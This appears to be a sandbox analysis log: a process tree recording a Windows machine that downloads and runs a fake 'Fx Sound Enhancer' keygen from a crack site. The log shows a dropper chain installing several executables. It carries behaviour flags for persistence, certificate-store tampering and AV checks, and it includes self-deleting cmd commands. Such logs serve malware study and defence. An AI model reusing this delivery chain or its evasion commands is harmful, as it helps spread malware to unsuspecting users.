"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffd057d6e00,0x7ffd057d6e10,0x7ffd057d6e20
2⤵
PID:4808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1572 /prefetch:2
2⤵
PID:3472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1612 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
2⤵
PID:3184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
2⤵
PID:3004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
2⤵
PID:504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
2⤵
PID:732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
2⤵
PID:844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
2⤵
PID:1004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4200 /prefetch:8
2⤵
PID:2528

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5184 /prefetch:8
2⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4620 /prefetch:8
2⤵
PID:1824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:8
2⤵
PID:4652

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:4656

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff7e84f7740,0x7ff7e84f7750,0x7ff7e84f7760
3⤵
PID:4540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:8
2⤵
PID:4208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
2⤵
PID:2388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:8
2⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:8
2⤵
PID:2788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
2⤵
PID:2164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:8
2⤵
PID:5100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
2⤵
PID:360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
2⤵
PID:3792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
2⤵
PID:4240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4680 /prefetch:8
2⤵
PID:2196

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:8
2⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
2⤵
PID:3912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4720 /prefetch:8
2⤵
PID:2272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6152 /prefetch:8
2⤵
PID:4640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:8
2⤵
PID:208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
2⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6484 /prefetch:8
2⤵
PID:2932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:8
2⤵
PID:4892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
2⤵
PID:3136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5252 /prefetch:8
2⤵
PID:4048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6752 /prefetch:8
2⤵
PID:3804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:8
2⤵
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6988 /prefetch:8
2⤵
PID:4660

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5656 /prefetch:8
2⤵
PID:1180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5532 /prefetch:8
2⤵
PID:4072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7192 /prefetch:8
2⤵
PID:4608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:8
2⤵
PID:3796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:1
2⤵
PID:4636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7164 /prefetch:8
2⤵
PID:2220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:8
2⤵
PID:3164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3528 /prefetch:8
2⤵
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
2⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7220 /prefetch:8
2⤵
PID:2808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7216 /prefetch:8
2⤵
PID:2084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
2⤵
PID:2888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:8
2⤵
PID:4208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7316 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
2⤵
PID:4640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7156 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
2⤵
PID:2080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8
2⤵
PID:3776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3924 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:364

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:8
2⤵
PID:848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
2⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1564,7389676632715342924,12888169779112232971,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
2⤵
PID:4432

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1832

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\KeygenNinja.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:2352

C:\Windows\system32\msinfo32.exe
"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\KeygenNinja.nfo"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:4668

C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Temp2_Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.zip\Fx_Sound_Enhancer_13_keygen_by_KeygenNinja.exe"
1⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
PID:4780

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
4⤵
- Executes dropped EXE
PID:4856

C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
5⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
keygen-step-2.exe
3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3960

C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe
"C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\FD3D.tmp.exe"
5⤵
PID:2828

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
4⤵
PID:2768

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:3904

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:3556

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
PID:2788

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
PID:2784

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:1436

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
PID:4644

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4036

C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2516

C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 1 3.1616869295.605f77af35bb3 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1596

C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\2JG3OIROEB\multitimer.exe" 2 3.1616869295.605f77af35bb3
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe
"C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe" /VERYSILENT
8⤵
- Executes dropped EXE
PID:4788

C:\Users\Admin\AppData\Local\Temp\is-DGMJ9.tmp\e2c4myx2qb2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DGMJ9.tmp\e2c4myx2qb2.tmp" /SL5="$103C0,2592217,780800,C:\Users\Admin\AppData\Local\Temp\ctohh5g3bux\e2c4myx2qb2.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5184

C:\Users\Admin\AppData\Local\Temp\is-D9K2M.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-D9K2M.tmp\winlthsth.exe"
10⤵
- Executes dropped EXE
PID:5520

C:\Windows\SysWOW64\WerFault.exe
